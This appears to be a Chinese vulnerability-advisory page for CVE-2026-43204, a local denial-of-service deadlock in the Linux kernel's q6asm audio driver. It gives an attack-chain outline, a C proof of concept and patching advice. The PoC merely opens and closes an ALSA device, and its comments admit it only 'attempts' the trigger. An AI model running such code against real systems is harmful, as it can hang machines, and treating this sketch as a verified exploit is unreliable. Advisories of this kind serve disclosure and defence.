CVE-2026-43204 CVSS 5.5 中危

CVE-2026-43204 Linux内核q6asm驱动拒绝服务漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43204

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的ASoC: qcom: q6asm组件存在安全漏洞。该漏洞源于在关闭数据流后，未能正确忽略DSP（数字信号处理器）的响应。尽管之前的提交尝试解决此问题，但响应仍被处理，导致系统死锁。本地低权限攻击者可利用此漏洞导致系统可用性受损，造成拒绝服务。

技术细节

该漏洞位于Linux内核的Qualcomm ALSA SoC (ASoC) q6asm音频驱动程序中。当应用程序关闭音频数据流时，驱动程序本应忽略随后到达的DSP响应。然而，现有的实现逻辑存在缺陷，特别是在之前的补丁尝试修复后，仍然会对已关闭流对应的DSP响应进行处理。这会导致内核状态不一致，进而引发锁死或无响应的竞争条件。攻击者需要具有本地低权限访问权限。通过特定的音频操作序列触发该逻辑缺陷，诱使系统在流关闭后仍处理DSP中断或响应消息。由于资源已被释放或状态标记为无效，处理这些响应会导致内核自旋锁或互斥锁死锁，从而造成系统挂起。

攻击链分析

STEP 1

步骤1

攻击者获得本地系统的低权限访问权限。

STEP 2

步骤2

攻击者执行恶意程序，调用ALSA接口与q6asm驱动进行交互。

STEP 3

步骤3

程序以特定序列打开并关闭音频数据流，触发驱动逻辑缺陷。

STEP 4

步骤4

内核收到已关闭流对应的DSP响应并错误地处理该响应。

STEP 5

步骤5

由于状态不一致，内核发生死锁，导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <alsa/asoundlib.h>
#include <stdlib.h>

// PoC for CVE-2026-43204: Triggering lockup in q6asm
// This code attempts to reproduce the condition where DSP responses
// are handled after a stream is closed.

int main() {
    snd_pcm_t *pcm_handle;
    snd_pcm_hw_params_t *hw_params;
    int err;

    // Open PCM device for playback (0,0 usually targets the specific platform)
    if ((err = snd_pcm_open(&pcm_handle, "hw:0,0", SND_PCM_STREAM_PLAYBACK, 0)) < 0) {
        fprintf(stderr, "Cannot open audio device: %s\n", snd_strerror(err));
        exit(1);
    }

    // Allocate hardware parameters object
    snd_pcm_hw_params_alloca(&hw_params);
    
    // Initialize with default values
    if ((err = snd_pcm_hw_params_any(pcm_handle, hw_params)) < 0) {
        fprintf(stderr, "Cannot initialize hardware parameter structure: %s\n", snd_strerror(err));
        exit(1);
    }

    // Set access type and sample format
    if ((err = snd_pcm_hw_params_set_access(pcm_handle, hw_params, SND_PCM_ACCESS_RW_INTERLEAVED)) < 0) {
        fprintf(stderr, "Cannot set access type: %s\n", snd_strerror(err));
        exit(1);
    }

    if ((err = snd_pcm_hw_params_set_format(pcm_handle, hw_params, SND_PCM_FORMAT_S16_LE)) < 0) {
        fprintf(stderr, "Cannot set sample format: %s\n", snd_strerror(err));
        exit(1);
    }

    // Set parameters
    if ((err = snd_pcm_hw_params(pcm_handle, hw_params)) < 0) {
        fprintf(stderr, "Cannot set parameters: %s\n", snd_strerror(err));
        exit(1);
    }

    printf("Stream opened. Preparing to trigger vulnerability...\n");

    // Simulate activity that generates DSP responses
    // The vulnerability occurs when the stream is closed while DSP might still be responding
    
    // Close the stream immediately or under specific timing conditions
    // The driver should drop responses, but the bug causes it to process them, leading to a lockup.
    snd_pcm_close(pcm_handle);

    printf("Stream closed. If vulnerable, the system may lockup now.\n");
    
    return 0;
}

影响范围

Linux Kernel (受特定提交影响，需应用修复补丁)

防御指南

临时缓解措施

建议管理员尽快将Linux内核更新到包含补丁的版本。如果无法立即升级，应严格控制系统本地访问权限，防止潜在攻击者利用此漏洞导致系统崩溃。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表